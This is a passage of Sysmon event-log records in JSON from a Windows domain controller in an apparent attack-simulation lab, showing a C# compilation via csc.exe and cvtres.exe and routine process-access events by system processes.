05:52:47.777","ProcessGuid":"{A837DB8D-032F-5F25-0000-0010149B0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESE16E.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\x31htb3z\\CSCF5F14E36D8D04D21ABC5905061C378F8.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032E-5F25-0000-0020CE520A00}","LogonId":"0xa52ce","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{A837DB8D-032F-5F25-0000-00108C970A00}","ParentProcessId":"2856","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\x31htb3z\\x31htb3z.cmdline\"","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5526,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.766\r\nSourceProcessGUID: {A837DB8D-032F-5F25-0000-00108C970A00}\r\nSourceProcessId: 2856\r\nSourceThreadId: 4684\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {A837DB8D-032F-5F25-0000-0010149B0A00}\r\nTargetProcessId: 4688\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.766","SourceProcessGUID":"{A837DB8D-032F-5F25-0000-00108C970A00}","SourceProcessId":"2856","SourceThreadId":"4684","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{A837DB8D-032F-5F25-0000-0010149B0A00}","TargetProcessId":"4688","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5527,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.766\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032F-5F25-0000-0010149B0A00}\r\nTargetProcessId: 4688\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.766","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032F-5F25-0000-0010149B0A00}","TargetProcessId":"4688","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5528,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.766\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.766","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5529,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.766\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.766","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5530,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.766\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.766","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5531,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.766\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.766","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5532,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.766\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.766","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5533,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.766\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 